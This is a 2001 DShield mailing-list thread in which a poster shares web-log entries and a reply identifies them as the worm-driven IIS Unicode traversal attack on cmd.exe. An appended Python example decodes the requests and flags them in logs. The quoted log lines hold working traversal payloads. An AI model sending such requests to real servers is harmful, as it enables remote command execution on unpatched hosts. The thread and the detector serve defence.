[Dshield] win32 exploit?

Scott Fendley scottf at uark.edu
Fri Aug 3 20:38:22 GMT 2001


If I remember correctly, this is a Unicode attack done by the poisonbox
worm that has been around for months now. I think poisonbox is actually
associated with the good ole sadmin (Solaris) to IIS unicode attack.  I
would verify that you have all your patches in place, and if you find
root.exe under your C:\inetpub (or wherever your website is located)
directory structure...then worry.  They have managed to move a copy of
cmd.exe into the directory structure and now can form commands to that exe
file to do more destructive things.

Scott



On Fri, 3 Aug 2001, Joseph Shraibman wrote:

> Does anyone know what this is?
>
> 216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"
>
> [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> bogus_host_without_reverse_dns 207.213.220.70 - - [06/Apr/2001:22:21:26
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 344
> bogus_host_without_reverse_dns 128.121.2.139 - - [16/Jun/2001:18:14:33
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 -
> error_log:[Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70]
> File does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> error_log:[Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File
> does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> error_log:[Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File
> does not exist:
> /local/www/apps253/apps/scripts/..Á?../winnt/system32/cmd.exe
> error_log:[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File
> does not exist:
> /local/www/apps253/apps/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> "-" "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
> [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-"
> "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
> [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
>
>
> --
> Joseph Shraibman
> jks at selectacast.net
> Increase signal to noise ratio.  http://www.targabot.com
>
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see: http://www1.dshield.org/mailman/listinfo/dshield
>

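The following is an added example, not code from either poster in this thread. It models the two IIS decoding flaws that the requests quoted above depend on (overlong UTF-8 such as %c0%af / %c1%9c, and the double-decode that turns %255c into a backslash) and runs Apache-style access-log lines through that model to flag traversal probes aimed at cmd.exe, plus direct calls to root.exe, the renamed copy of cmd.exe that Scott's reply says to look for. The sample lines are reassembled onto one line each from the wrapped entries in the post, with one constructed benign request added for contrast; the decoder is a simplified emulation, not the actual IIS code.

```python
# Added example (not from the DShield thread): emulate the two IIS decoding
# flaws behind the probes quoted above and flag them in Apache-style log lines.
import re
import urllib.parse

# Sample input, reassembled onto single lines from the wrapped entries quoted
# in the post; the last line is a constructed benign request for contrast.
SAMPLE_LOG = """\
216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"
61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
bogus_host_without_reverse_dns 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 344
10.0.0.5 - - [03/Aug/2001:13:30:00 -0400] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
"""

# Common/combined log format; an optional vhost token may precede the client IP.
LOG_RE = re.compile(
    r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>[^"\s]+)(?: [^"]*)?" (?P<status>\d{3})'
)
TRAVERSAL = re.compile(r'(?:^|/)\.\.(?:/|$)')


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 the permissive way pre-patch IIS did (MS00-078).

    Any two-byte sequence C0..DF 80..BF is accepted, including the 'overlong'
    forms of plain ASCII: C0 AF -> '/' and C1 9C -> '\\'. A strict decoder
    rejects C0/C1 lead bytes, so the literal text '../' never appears in the
    request and a filter that looks for it before decoding sees nothing.
    """
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append('\ufffd')  # longer sequences are not needed here
            i += 1
    return ''.join(out)


def iis_normalize(raw_path: str) -> str:
    """Return the filesystem path a vulnerable IIS would have opened.

    Step 1: percent-decode to bytes   (%c0%af -> C0 AF, %255c -> '%5c').
    Step 2: lenient UTF-8              (C0 AF -> '/', C1 9C -> '\\').
    Step 3: decode a second time, the 'superfluous decode' flaw (MS01-026),
            which is the pass that turns the leftover '%5c' into '\\'.
    Backslashes are then folded to '/' so traversal segments look the same.
    """
    path_only = raw_path.split('?', 1)[0]
    step1 = urllib.parse.unquote_to_bytes(path_only)
    step2 = lenient_utf8_decode(step1)
    step3 = urllib.parse.unquote(step2)
    return step3.replace('\\', '/')


def is_probe(decoded_path: str) -> bool:
    """True for a traversal to cmd.exe, or any call to root.exe (the renamed
    copy of cmd.exe that Scott's reply says to look for under the web root)."""
    lower = decoded_path.lower()
    if lower.endswith('/root.exe'):
        return True
    return lower.endswith('/cmd.exe') and TRAVERSAL.search(decoded_path) is not None


def scan(log_text: str) -> list:
    """Parse each log line and report the probes, with what the server replied."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        decoded = iis_normalize(m['path'])
        if not is_probe(decoded):
            continue
        status = int(m['status'])
        hits.append({
            'ip': m['ip'],
            'status': status,
            'decoded': decoded,
            # 404: the target did not exist (Apache has no /winnt). 2xx: the
            # server answered the command; on an IIS box that is the moment
            # to check patch levels and look for root.exe, as the reply says.
            'answered': 200 <= status < 300,
        })
    return hits


if __name__ == '__main__':
    for h in scan(SAMPLE_LOG):
        verdict = 'ANSWERED, inspect host' if h['answered'] else 'failed probe'
        print(f"{h['ip']:<16} {h['status']} {verdict:<23} {h['decoded']}")
```

The point of decoding before matching is that none of the quoted requests contains the text "../" as sent; only after the overlong or double-encoded bytes are interpreted the way the vulnerable server interpreted them does the traversal become visible. On an Apache host these requests simply 404, which is why the poster's error_log shows "File does not exist"; the status column is what separates noise from a request a server actually acted on.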


